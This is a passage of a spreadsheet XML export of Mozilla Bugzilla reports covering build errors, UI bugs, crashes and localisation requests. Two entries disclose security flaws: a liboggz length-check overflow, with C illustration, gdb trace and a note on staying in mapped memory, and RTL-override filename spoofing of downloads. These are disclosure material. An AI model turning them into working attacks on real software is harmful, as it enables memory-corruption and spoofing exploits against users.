Check Setup Errors
Checking Testopia setup ...
Updating column case_run_status_id in table test_case_run_status ...
Old: TINYSERIAL NOT NULL PRIMARY KEY
New: serial unique NOT NULL PRIMARY KEY
An error occurred processing hook install-update_db in
    extension ./extensions/testopia: DBD::Pg::db do failed: ERROR:  type
serial does not exist
 at Bugzilla/DB.pm line 525
Bugzilla::DB::bz_alter_column_raw('Bugzilla::DB::Pg=HASH(0x7f00c6b9de08)' 'test_case_run_status' 'case_run_status_id' 'HASH(0x7f00c3b79e98)' 'HASH(0x7f00c66303c0)' undef) called at Bugzilla/DB.pm line 484
        Bugzilla::DB::bz_alter_column('Bugzilla::DB::Pg=HASH(0x7f00c6b9de08)'
'test_case_run_status' 'case_run_status_id' 'HASH(0x7f00c3b79e98)')
called at ./extensions/testopia/code/install-update_db.pl line 103
        Bugzilla::Hook::testopiaUpdateDB() called
at ./extensions/testopia/code/install-update_db.pl line 31
        require ./extensions/testopia/code/install-update_db.pl called at
Bugzilla/Hook.pm line 46
        Bugzilla::Hook::process('install-update_db') called at
Bugzilla/Install/DB.pm line 529
        Bugzilla::Install::DB::update_table_definitions() called
at ./checksetup.pl line 195
Expected Results:  
No errors.</t>
  </si>
  <si>
    <t>TOOLKIT-405068</t>
  </si>
  <si>
    <t>Remove localized Get (extensions|themes) URLs</t>
  </si>
  <si>
    <t>Created attachment 289894
Fix v.1
Even though Mossop will probably remove both the localized URLs and the pref URLs and the Get ... links too in bug 404024 that's not guaranteed to make it in and as bug 384897 and http://lxr.mozilla.org/l10n-mozilla1.8/search?string=getmoreextensionsurl demonstrate we really *really* don't want to have those as localized URLs.
In fact they were removed once in bug 348076 but without fixing the non-Fx users and without persuading SeaMonkey that if they actually do want to localize URLs they don't want to do it through a toolkit .properties where there will be only one localized URL for all consumers but through their own app-specific .properties file.
Right now Fx Tb and SM are all using non-localized URLs in prefs so once bug 405039 and bug 405063 land to switch Sunbird and Composer over we can just remove them and not have to worry about whether the localized versions are http or https or the current version of the URL or the previous one or the one before that or the one before that.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-260247</t>
  </si>
  <si>
    <t>Mozilla installer and build system doesn't register all of ChatZilla (clicking on URLs cause Internal Error Message)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.8a4) Gecko/20040917
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.8a4) Gecko/20040917
doesn't link for New Window at all and variously for double-click or New
Tab depending if a browser window is already open somewhere.
Reproducible: Always
Steps to Reproduce:
1. Open chat window
2. click on a URL link which should open in the browser
3. works/not works with left-click/right-click(new window)/right-click(new tab)
Actual Results:  
[ERROR]	Internal error dispatching command â€œgoto-urlâ€.
[ERROR]	ReferenceError: getBrowserURL is not defined @
 476
and the link doesn't open
Expected Results:  
umm... opened in current-browser-window new window new tab depending ?
browser build 13.8a4 Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.8a4)
Gecko/20040917</t>
  </si>
  <si>
    <t>plinnane3</t>
  </si>
  <si>
    <t>CORE-411968</t>
  </si>
  <si>
    <t>Finishing JS_AlreadyHasOwnProperty</t>
  </si>
  <si>
    <t>The new JS_AlreadyHasOwnProperty API (bug 400793) isn't finished: it isn't documented.  I'm working on that and I have a few questions.
* Why not call it JS_HasOwnProperty?  (I think we should.  We can still rename it it hasn't been in a release yet.)
* The implementation is quite different from the implementation of obj_hasOwnProperty (in jsobj.c).  Can some code be shared here?
* Object.prototype.hasOwnProperty() handles inner/outer objects specially.  When searching for a property on an object x if the property is found on x's outer object the JSAPI says false the JS method says true.  Is that intentional?
* Object.prototype.hasOwnProperty() also handles JSPROP_SHARED JSPROP_PERMANENT properties specially.   JS_AlreadyHasOwnProperty doesn't so it exposes an implementation detail about Function.length/arity.  Is that intentional?</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-392221</t>
  </si>
  <si>
    <t>Test case for applet with  and  (relative height) needs to be updated</t>
  </si>
  <si>
    <t>This spins from bug 360039 and bug 211530 #comment 10 and bug 211530 #comment 12.
This bug applies to both test-webpage:
 with relative height:
http://www.mozilla.org/quality/browser/front-end/testcases/oji/objtest7.html
 with relative height:
http://www.mozilla.org/quality/browser/front-end/testcases/oji/test7.html
I think we need to - at least - update+correct the testcases' explanations so that the tester would know what to expect and a bit of explanation (why) (parent's height is auto) so that he wouldn't file bug. As it stands everything in the testcases test7.html and objtest7.html lead or would lead a tester to report a bug.
Another idea would be to create a wrapping div with a fixed height so that the testcase would evaluate measure and test the rendering of an | when given a relative height. This would be ideal.
Expected results:
-----------------
1- Provide explanation in respective documents (test7.html and objtest7.html) that when an  or  has height=nn% and when its parent's height is not explicitly specifically defined (i.e. it depends on content height) then the parent's height is auto. So then the  or  height is resolved as auto which refers to intrinsic height where
's intrinsic height is 240px and
's intrinsic height is 0px
2- Give the wrapping  a defined specified height so that both tests could measure evaluate the testing browser. E.g.:
For :
Object height=25% within a 400px p
For :
  Object height=25% within a 400px p
  &lt;object codebase=. data=JitterText.class type=application/java
  width=400 height=25% classid=java:JitterText.class name=
  testApplet&gt;
Assigned -&gt; me</t>
  </si>
  <si>
    <t>CORE-400578</t>
  </si>
  <si>
    <t>Font rendering using itemized glyph runs ugly with font-size-adjust style</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a9pre) Gecko/2007101920 Firefox/3.0a9pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a9pre) Gecko/2007101920 Firefox/3.0a9pre
Font rendering using itemized glyph runs CreateGlyphRunsItemizing() looks pretty bad when the font-size-adjust style is used. The text seems squished horizontally. Fast path (8 bit CreateGlyphRunsFast()) rendering looks fine. See the attached test case for examples.
I believe this is a regression from bug 362682 as build 2007-10-05-04 does not exhibit the problem and 2007-10-06-04 does. I also think the changes to CreateGlyphRunsItemizing() are key. If I restore that and the code it depends on to the pre bug 362682 state rendering is fine.
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-514618</t>
  </si>
  <si>
    <t>Filter (restrict) the visibility of a custom field by classification</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Build Identifier: 
Hi for me it would be very interesting to get the possibility to map the cf_ custom field to one classification or multiple classifications. At the moment you can just select a single product one some other single options. However for the configuration it would be nice to map a custom field to classifications.
Reproducible: Always
Steps to Reproduce:
1.See http://servername/bugzilla/editfields.cgi?action=edit&amp;name=cf_customfield.
2.Under the menu Field only appears when: should be the classifications selectable.
3.
Expected Results:  
Under http://servername/bugzilla/editfields.cgi?action=edit&amp;name=cf_customfield the classifications should be selectable for custom fields.
I've tried to implement the mapping of a custom field to a classification about the database mapping table. But this just caused an error.</t>
  </si>
  <si>
    <t>SKropp</t>
  </si>
  <si>
    <t>NSS-367288</t>
  </si>
  <si>
    <t>write tests that covers existing OCSP functionality</t>
  </si>
  <si>
    <t>Currently there are not test that covers NSS functionality in the area of OCSP.
There are at least two scenarios that we can test using ocspclnt:
  * test revocation status for a cert using trusted responder ca and
    designated responder certs as signers.
  * fully verify cert and it's usage in a different period of time.</t>
  </si>
  <si>
    <t>CORE-480521</t>
  </si>
  <si>
    <t>liboggz and libfishsound fail to validate input</t>
  </si>
  <si>
    <t>Created attachment 364500
ogg4.ogg - crashing testcase
in the loop of oggz_comments_decode:
len=readint(c 0)
if (c+len&gt;end) return -1
c+=len
the |if| condition misbehaves for negative and/or overflowing |length| on both 32 and 64 bit linux.
this C code illustrates the problem:
char *a*b
volatile int l
a=malloc(20)
b=a+40
l= -2
if (a+l &gt; b) 
	printf(&gt;\n)
else
	printf(&lt;=\n)
opening the testcase ogg4.ogg causes:
(gdb) break oggz_comments.c:611
(gdb) p/x len
$1 = 0x9000001a
gdb) next
581        for (i=0i&lt;nb_fieldsi++) {
(gdb) p/x c
$2 = 0x7f5e9ea44050
(gdb) x/4x c
0x7f5e9ea44050: Cannot access memory at address 0x7f5e9ea44050
(gdb) cont
Continuing.
Program received signal SIGSEGV Segmentation fault.
0x00007f5f15ec7559 in oggz_comments_decode (oggz=0x7f5f0ebe0000 
    serialno=2401 comments=0x7f5f0ea44007 # length=73)
    at /opt/pub/firefox-central/src/media/liboggz/src/liboggz/oggz_comments.c:584
584           len=readint(c 0)
the testcase crashesh on purpose. small values of |len| like -1 will keep attacker in mapped space.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-304350</t>
  </si>
  <si>
    <t>Core preferences system bug stops ChatZilla startup</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
When I open Chatzilla from the Firefox toolbar or menu (or any other manual
method) it displays the following error message:
[Exception... Component returned failure code: 0x80520008
(NS_ERROR_FILE_ALREADY_EXISTS) [nsIPrefService.savePrefFile]  nsresult:
0x80520008 (NS_ERROR_FILE_ALREADY_EXISTS)  location: JS frame ::
chrome://chatzilla/content/lib/js/pref-manager.js :: pm_arrayupdate :: line 256
 data: no]
+ QueryInterface (function) [native code]
+ message (string) 'Component returned failure code: 0x80520008
(NS_ERROR_FILE_ALREADY_EXISTS) [nsIPrefService.savePrefFile]'
+ result (number) 2152857608
+ name (string) 'NS_ERROR_FILE_ALREADY_EXISTS'
+ filename (string) 'chrome://chatzilla/content/lib/js/pref-manager.js'
+ lineNumber (number) 256
+ columnNumber (number) 0
+ location (object)
+ inner (object) null
+ data (object) null
+ toString (function) [native code]
+ initialize (function) [native code]
*
After pressing 'OK' to this message the main chat window is missing and none
of the menu items at the top of the screen (File edit etc.) are present either.
It is important to note that if Chatzilla is opened from following an IRC
hyperlink from a webpage in Firefox this error does not occur at all and
Chatzilla opens fine.
Several extensions are installed on my system I'll list them under additional
information
Reproducible: Always
Steps to Reproduce:
1.  Run Chatzilla from the toolbar menu etc.
Actual Results:  
No menu items at top of screen error message no Chatzilla window/welcome message.
Expected Results:  
Should have displayed Chatzilla window/welcome message no error window should
have displayed menu items at top of screen.
The following extensions are installed:
Translate 0.6.0.7
BugMeNot 0.6.2
Image Toolbar 0.5
Nuke Anything 0.2
Google Pagerank Status 0.9.3
FLST 0.8.3
Context Search 0.2
BetterSearch 1.8.7
Sage 1.3.5
Adblock v.5 d2 * nightly 39
Bandwidth Tester 0.5.4
undoclosetab 20041125.5
CustomizeGoogle 0.23
Greasemonkey 0.3.5
Chatzilla 0.9.68.5
Greasemonkey scripts installed affect these sites:
Amazon.com
IGN.com
IMDB.com
Weather.com
Gamespot.com
Gamespy.com
Macworld.com</t>
  </si>
  <si>
    <t>gc.17</t>
  </si>
  <si>
    <t>CORE-342961</t>
  </si>
  <si>
    <t>Get a CSS error on displaying any SVG</t>
  </si>
  <si>
    <t>CSS Error (resource://gre/res/svg.css :72.30): Unknown pseudo-class or
pseudo-element '-moz-svg-foreign-content'.  Ruleset ignored due to bad
selector.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-511521</t>
  </si>
  <si>
    <t>downloading file with RTL override (RLO) presents conflicting filenames</t>
  </si>
  <si>
    <t>Created attachment 395411
dialog presented when downloading S[RLO]iva.exe on Mac
When downloading a file with the unicode RTL override character (RLO) in it (S[RLO]iva.exe) the file download dialog presents two different filenames: one in the title (Sexe.avi) and one in the content of the dialog (Savi.exe).  The RLO character is stripped for the Save dialog later presented. 
This is inconsistent use of the RLO unicode character U+202E.  Perhaps it should just be removed from any downloaded filename.</t>
  </si>
  <si>
    <t>SEAMONKEY-234014</t>
  </si>
  <si>
    <t>Use the XUL preprocessor for build-time inserting of skinVersion strings</t>
  </si>
  <si>
    <t>I intend to do the same as in bug 232011 here for skinVersion so if we
have/want to bump skinVersion again it's a one-liner and does work without any
headaches.
This time I won't have to rename any .in files back to non-.in and our scripts
already pick up contents.rdf files with a leading * in jar.mn so there should
be no tree breakage. I also won't change the skinVersion from 1.5 to anything
else in this patch so it should have no influence in FF TB or other projects.
BTW this is also what Firefox people want to do in bug 217410 for their own chrome.</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-341491</t>
  </si>
  <si>
    <t>cert trist dialogs appear repeatedly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8) Gecko/20060321 Firefox/2.0a1
Build Identifier: Minimo on MDA of T-mobile
 logging in on secure website with login/password I get Security Warning popup:
there are problems with the trust of a certificate. This means that you may not be making a safe connection. Do you want to continue?
After clicking 3 times yes it's working. 
But each time I click on something on that page I have the popup again and have to answer 3 times with Y
Reproducible: Always
Steps to Reproduce:
1.https://wwww.freerkjongsma.nl
2.Than you will see the popup allready and have to push tree times Y
3.when I enter user/pasw same thing again</t>
  </si>
  <si>
    <t>freerk</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-437272</t>
  </si>
  <si>
    <t>support-stage.mozilla.org is down (db connection error)</t>
  </si>
  <si>
    <t>The error is:
Unable to connect to the database !
Lost connection to MySQL server during query</t>
  </si>
  <si>
    <t>CORE-501082</t>
  </si>
  <si>
    <t>[HTML5] MSVC takes forever to optimize nsHtml5NamedCharacters::initializeStatics</t>
  </si>
  <si>
    <t>I landed a workaround: https://hg.mozilla.org/mozilla-central/rev/f6333b700d60
We could experiment with disabling specific optimizations (per http://msdn.microsoft.com/en-us/library/chh3fb0k.aspx ) and seeing which one is to blame.</t>
  </si>
  <si>
    <t>CORE-401554</t>
  </si>
  <si>
    <t>Setting defaultSelected on options can make multiple options selected</t>
  </si>
  <si>
    <t>Created attachment 286549
testcase
See testcase when opening the select you see all options selected while you only should see only one option selected (option 4 probably).
This regressed between 2007-08-20 and 2007-08-21:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-08-20+04&amp;maxdate=2007-08-21+09&amp;cvsroot=%2Fcvsroot
Because of bug 391994 I guess.
Now defaultSelected didn't seem to work at all before that it seems. So that's why it doesn't cause this layout issue I guess.
As a sidenote as a result I would expect:
Result:
Option 1
Option 4
And after a reload:
Result:
Option 4
Option 4
This is a (small) problem on the united airlines websites where you can see two options selected when opening the Month combobox.
I guess there is also some relation to bug 395107 here.</t>
  </si>
  <si>
    <t>CORE-497519</t>
  </si>
  <si>
    <t>Crash [@ nsBlockFrame::CheckFloats] with legend in XBL fieldset</t>
  </si>
  <si>
    <t>Created attachment 382664
testcase (crashes Firefox when loaded)
###!!! ASSERTION: Legends should not be positioned and should not float: '!disp-&gt;IsAbsolutelyPositioned() &amp;&amp; !disp-&gt;IsFloating()' file layout/forms/nsLegendFrame.cpp line 53
###!!! ASSERTION: inserting after sibling frame with different parent: '!aPrevFrame || aPrevFrame-&gt;GetParent() == this' file layout/generic/nsBlockFrame.cpp line 4869
###!!! ASSERTION: prev sibling not in line list: 'Not Reached' file layout/generic/nsBlockFrame.cpp line 4960
###!!! ASSERTION: not in child list: 'found' file layout/base/nsCSSFrameConstructor.cpp line 1558
Crash [@ nsBlockFrame::CheckFloats] touching 0xddddddfd.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-945327</t>
  </si>
  <si>
    <t>crash in libc.so@0x22048 / libc.so@0x21f90  -  Android 4.4 Nexus devices - Downloading files</t>
  </si>
  <si>
    <t>This bug was filed from the Socorro interface and is 
report bp-f6c44ac6-311d-4f1a-a60e-078ee2131201.
=============================================================
Crash on the older Nexus 7 2012 when running Android 4.4 http://en.wikipedia.org/wiki/Nexus_7_%282012_version%29</t>
  </si>
  <si>
    <t>kbrosnan</t>
  </si>
  <si>
    <t>THUNDERBIRD-484145</t>
  </si>
  <si>
    <t>RSS feed subscriptions from Fx not working</t>
  </si>
  <si>
    <t>I cannot subscribe to RSS feeds from FF (3.0.7). This is the same symptoms as bug 348450. Nightly build from 2009-03-13 works 2009-03-14 does not work.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-307309</t>
  </si>
  <si>
    <t>Make winembed use libxul</t>
  </si>
  <si>
    <t>This is a spinoff for part two of bug 302099 - embedding libxul with a
standardized XRE_InitEmbedding function. I apparently have this working on
windows now by golly.</t>
  </si>
  <si>
    <t>CORE-258121</t>
  </si>
  <si>
    <t>Crash when right-clicking on image replaced with alt text multiple times</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a3) Gecko/20040829
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a3) Gecko/20040829
Encountered by accident after coming to a page with broken images crash on
right clicking image multiple times in a row.
Reproducible: Always
Steps to Reproduce:
1. Open URL
2. Right click on alt text for image
3. Click Copy Image Location or Properties
4. Right click on image
Actual Results:  
Crash.
Expected Results:  
Show right click menu no crash.
Talkback ID 735796.
May be regression (no crash on old FF build I use).</t>
  </si>
  <si>
    <t>BUGZILLA-281845</t>
  </si>
  <si>
    <t>Possible to delete users who are initial QA contacts</t>
  </si>
  <si>
    <t>Under Bugzilla 2.16 it was not possible to delete a user who was either an 
Initial QA Contact or an Initial Owner.
Under 2.18 (as of 2.17.1 actually) this changed to Initial Owner only.
This appears to be an unintentional regression brought on by the landing of bug 
43600 the patch author mistakenly used components.id here instead of 
components.product_id. 
Given that it's been this way for three years now and nobody else seems to 
have noticed I'm guessing it hasn't terribly inconvenienced many people... :)
Patch to follow.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-263762</t>
  </si>
  <si>
    <t>remove Opt+F4 from shortcut list for FF-Mac and IE-Mac</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.3) Gecko/20041009 Firefox/0.10
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.3) Gecko/20041009 Firefox/0.10
Opt+F4 Close Window Keyboard Shortcut does not work.  Alternate shorcut
Shift+Cmd+F4 shortcut does work.
Reproducible: Always
Steps to Reproduce:
1. Press Opt+F4 in open window
Actual Results:  
Nothing
Expected Results:  
Window should close</t>
  </si>
  <si>
    <t>rcchicago+allizgub</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-515573</t>
  </si>
  <si>
    <t>[l10n: bn-IN] updated main.lang file for www.mozilla.com</t>
  </si>
  <si>
    <t>Created attachment 399671
Updated main.lang file for Bengali India (bn-IN)
Updated main.lang file for Bengali India</t>
  </si>
  <si>
    <t>runabh</t>
  </si>
  <si>
    <t>BUGZILLA-354314</t>
  </si>
  <si>
    <t>Missing --do_not_change-- option for custom select fields when changing several bugs at once</t>
  </si>
  <si>
    <t>If you try to change several bugs at once on installations which use custom select fields these fields will be overwritten even if you don't want to change their value because there is no --do_not_change-- option for this kind of field.</t>
  </si>
  <si>
    <t>BUGZILLA-314490</t>
  </si>
  <si>
    <t>[PostgreSQL] meta-bug tracking issues specific to Pg</t>
  </si>
  <si>
    <t>Bug 98304 is fixed but there are still many issues when using PostgreSQL both version 7 and 8.
This meta-bug will also help the QA team to track these PostgreSQL-specific bugs.
mkanat justdave: what is the status of the Bugzilla support for PostgreSQL in 2.22? For 2.20 we said it was still experimental. Is that still the case for 2.22 or do we want a real support? If we want a real support for Pg in 2.22 we have a lot of work to do before the next release.</t>
  </si>
  <si>
    <t>CORE-328116</t>
  </si>
  <si>
    <t>Implement Cairo-on-OSX for Thebes gfx</t>
  </si>
  <si>
    <t>Add native CG rendering using cairo on Cocoa-widget-based Gecko builds.</t>
  </si>
  <si>
    <t>CORE-284389</t>
  </si>
  <si>
    <t>[FIX]revokeEvents doesn't always work correctly</t>
  </si>
  <si>
    <t>See the comment at
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/view/src/nsViewManager.cpp&amp;rev=3.388&amp;mark=361-362#360
I tried to code-inspect this away again and I think I see a way that this could
happen.  When an event queue is being popped
nsEventQueueServiceImpl::PopThreadEventQueue will:
1)  Call StopAcceptingEvents() on the queue
2)  Call ProcessPendingEvents() on the queue
Consider the case when processing one of these events causes a call to
revokeEvents on the thread on which we're popping the event queue.  The caller
will typically get the thread event queue and call revokeEvents on it.  The
thing is nsEventQueueServiceImpl::GetThreadEventQueue will get the youngest
queue that's still accepting events.  Since the queue being popped is no longer
accepting events an ancestor of it will get returned and hence events that
were posted to it will not get revoked.
Per blame we used to return just the youngest queue.  The change to returning
the youngest active one was made by darin in revision 1.34 of
nsEventQueueService the CVS comment is: freeze nsIChannel nsIRequest.  The
change doesn't seem to be part of the diffs in the relevant bug.
Darin do you know why you made this change?  Given that inactive queues forward
event posting to their ancestors it seems that it should be save to always
return the youngest event queue event if it's inactive for GetThreadEventQueue...</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-408353</t>
  </si>
  <si>
    <t>update nl.www.mozilla.com pages</t>
  </si>
  <si>
    <t>Due some type errors we need to update http://nl.www.mozilla.com/nl/firefox/2.0.0.10/whatsnew/ to rev8632 and 
http://nl.www.mozilla.com/nl/firefox/about/ to rev8834
Thanks</t>
  </si>
  <si>
    <t>SEAMONKEY-134839</t>
  </si>
  <si>
    <t>((OSX Classic) scrollbar appears in the middle of TEXTAREAs</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:0.9.9+)
Gecko/20020401
BuildID:    2002040108
Since bug 115758/bug 121440 was fixed (I think) vertical scrollbars in
TEXTAREAs no longer appear properly in the Classic theme.  Scrolling the
scrollbar will cause it to appear in the right place.
Reproducible: Always
Steps to Reproduce:
1. Open a page with a TEXTAREA in it that already contains some text.
Actual Results:  Vertical scrollbar appears in the middle of the text area.
Expected Results:  Vertical scrollbar appears at the right of the text area.</t>
  </si>
  <si>
    <t>njriley</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-379250</t>
  </si>
  <si>
    <t>[eu] asking for approval SeaMonkey dictionary URL</t>
  </si>
  <si>
    <t>For reference see bug:
https://bugzilla.mozilla.org/show_bug.cgi?id=367500</t>
  </si>
  <si>
    <t>MOZILLA.ORG-511238</t>
  </si>
  <si>
    <t>Get Trellon developer Alan Palazzolo (alan.palazzolo@gmail.com) SVN access for CRM project</t>
  </si>
  <si>
    <t>Created attachment 395163
Alan's SSH key
Please get Alan access to our SVN for the CRM repo at /projects/crm/.  This is urgent as my vacation has delayed his work about a week without SVN privileges.
I have submitted the signed committer's form to Erica and have attached his SSH key.
Thanks!</t>
  </si>
  <si>
    <t>CHAT_CORE-955159</t>
  </si>
  <si>
    <t>CHAT_CORE</t>
  </si>
  <si>
    <t>Fix compilation of purple/ with glib 2.32 and newer</t>
  </si>
  <si>
    <t>*** Original post on bio 1730 at 2012-10-16 22:08:00 UTC ***
*** Due to BzAPI limitations the initial description is in comment 1 ***</t>
  </si>
  <si>
    <t>CORE-214050</t>
  </si>
  <si>
    <t>Localize CAPS more</t>
  </si>
  <si>
    <t>Currently it throws a bunch of custom security js exceptions using hardcoded
strings which just so happen to be written in english.  Localize these.</t>
  </si>
  <si>
    <t>TREE_MANAGEMENT-619826</t>
  </si>
  <si>
    <t>OrangeFactor</t>
  </si>
  <si>
    <t>implement navigation links</t>
  </si>
  <si>
    <t>Currently there is no clear way of navigating between views.  There
should be an e.g. menubar that both shows what views are available and
gives links to each of these views possibly with tooltips.</t>
  </si>
  <si>
    <t>mcote</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-902061</t>
  </si>
  <si>
    <t>AVOps: Crestron</t>
  </si>
  <si>
    <t>No control of Vidyo output volume in SFO Commons (152)</t>
  </si>
  <si>
    <t>None of the available audio level controls on either the Advanced Audio page nor the Video Conference page of the Sidewinder interface affect the level of the audio output from the Vidyo endpoint neither in the room nor on the input to the AirMo Encoder.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-464744</t>
  </si>
  <si>
    <t>Upgrade FWSM from 3.1.2 to 3.1.12</t>
  </si>
  <si>
    <t>Fix for bug CSCsd67334.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-391433</t>
  </si>
  <si>
    <t>mozilla.com plugin detection and updating</t>
  </si>
  <si>
    <t>This is the working bug to get some javascript developed that will detect plug-in versions and guide the users through an update.
A requirements doc + plenty of examples and leads of how to accomplish is here: http://wiki.mozilla.org/PluginUpdating
It's all outlined on that page but here is the basic idea: We put some script that detects outdated versions of java and flash on first-run and updated landing pages. This will alert the user to navigate to a general-use plug-in detection page. 
Slater is working on getting mock-ups from the designer for the new landing page that is rolling out soon. We can integrate after that page has launched.
As for the general use page I have a really hokey mock-up on the wiki page. Feel free to use a little creative freedom. 
This will be pretty javascript intensive. I've probably missed something -- but there should be enough details to get started.</t>
  </si>
  <si>
    <t>CORE-360930</t>
  </si>
  <si>
    <t>test_file_protocol.js can fail based on execution environment</t>
  </si>
  <si>
    <t>test_file_protocol.js tests the file: protocol.  Among the ways in which it tests this is stream comparison of a file read through the protocol vs. a file read directly from disk.  To do the stream comparison the test reads from the appropriate input stream into a string:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/netwerk/test/unit/test_file_protocol.js&amp;rev=1.2&amp;mark=42#29
The code which does this however can fail.  The highlighted line in the URL above theoretically works (albeit in a thoroughly horrendous manner) but it can fail in practice.  The reason for this is that SpiderMonkey restricts function calls to 65535 arguments.  This isn't often a problem but one of the tests consists of checking for properly-formatted directory listings for the TmpD directory.  If /tmp contains an especially large number of files the second iteration of read_stream will be called with a count of 65536 (first time is 4096).  This causes onDataAvailable to throw which causes the isSuccessCode test in onStopRequest to fail which causes the entire test to fail.
Patch in a sec...</t>
  </si>
  <si>
    <t>THUNDERBIRD-464784</t>
  </si>
  <si>
    <t>What's New page</t>
  </si>
  <si>
    <t>Need What's New page to show what's new in the product and to message changes to the user.</t>
  </si>
  <si>
    <t>bugmil.ebirol</t>
  </si>
  <si>
    <t>JSS-374663</t>
  </si>
  <si>
    <t>Optimize build of JSS loses it's Header info</t>
  </si>
  <si>
    <t>The fix is to emulate the solution used in NSS for example
http://mxr.mozilla.org/security/ident?i=__nss_ssl_rcsid
http://mxr.mozilla.org/security/ident?i=__nss_builtins_rcsid</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-439671</t>
  </si>
  <si>
    <t>Please flush smarty template cache on support.mozilla.com</t>
  </si>
  <si>
    <t>support.mozilla.com is behaving weirdly. Clicking on an article link on the front page sometimes gives you This page can be found here
Other times the pages are just blank.</t>
  </si>
  <si>
    <t>SEAMONKEY-120265</t>
  </si>
  <si>
    <t>Getting uncaught exception when renaming profile to same name</t>
  </si>
  <si>
    <t>If I rename a profile to the same name I'm getting:
Error: uncaught exception: [Exception... 'Out' argument must be an object arg 
3 [nsIPromptService.prompt]  nsresult: 0x80570002 
(NS_ERROR_XPC_NEED_OUT_OBJECT)  location: JS frame :: 
chrome://communicator/content/profile/profileManager.js :: RenameProfile :: 
line 91  data: no]
To reproduce:
1. start mozilla in turbo from command line: mozilla -jsconsole -turbo
2. start mozilla profile: mozilla -ProfileManage
3. press the Rename profile buttona and just hit ok
build 20020115</t>
  </si>
  <si>
    <t>CORE-241249</t>
  </si>
  <si>
    <t>Text in column picker restore natural order is unclear to user</t>
  </si>
  <si>
    <t>[Jan this is a follow up on bug 222096 and spun off as a separate issue from
bug 221619 comment 29. This way the issue gets evaluated from any of the other
issues in that meta bug.]
Issue: i think it's unclear to the user what natural order is. I'm not aware
of  any other software using that terminology but apart from that i think
restore default order is a much more common way of putting it.</t>
  </si>
  <si>
    <t>FIREFOX-248982</t>
  </si>
  <si>
    <t>Tell your Friends feature under Help menu</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-242430</t>
  </si>
  <si>
    <t>cannot import bookmarks from latest firefox nightlies</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040502 Camino/0.8b
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040502 Camino/0.8b
Camino is unable to import bookmarks from the latest Firefox nightlies most
likely due to the change in profile location from ~/Library/Phoenix to
~/Library/Firefox
Reproducible: Always
Steps to Reproduce:
1. Camino -&gt; Import Bookmarks
2. Select Mozilla Firebird
3. Click Import
Actual Results:  
An empty bookmarks folder entitled Imported Mozilla Firebird Bookmarks is created.
Expected Results:  
A bookmarks folder entitled Imported Mozilla Firebird Bookmakrs is created
containing Firefox's bookmarks.</t>
  </si>
  <si>
    <t>hansenadam</t>
  </si>
  <si>
    <t>CALENDAR-283990</t>
  </si>
  <si>
    <t>sunbird doesn't start. entities not found</t>
  </si>
  <si>
    <t>When starting a trunk build of sunbird i only get errors about entities not
found. suspicious error on the console: 
WARNING: No chrome:packages arc found! file
/home/michiel/mozhack/tree5/mozilla/chrome/src/nsChromeRegistry.cpp line 1538</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-371670</t>
  </si>
  <si>
    <t>Use chrome.manifest in ChatZilla when building as in-tree extension</t>
  </si>
  <si>
    <t>Created attachment 256407
Proposed patch
SeaMonkey builds Chatzilla in its own build and it's moving to toolkits.
Regardless Chatzilla being built as an extension it should use manifests instead of contents.rdf for Suiterunner.
It's inside a #ifdef MOZ_XUL_APP so it won't break backward compatibility when building it as an extension.</t>
  </si>
  <si>
    <t>asrail</t>
  </si>
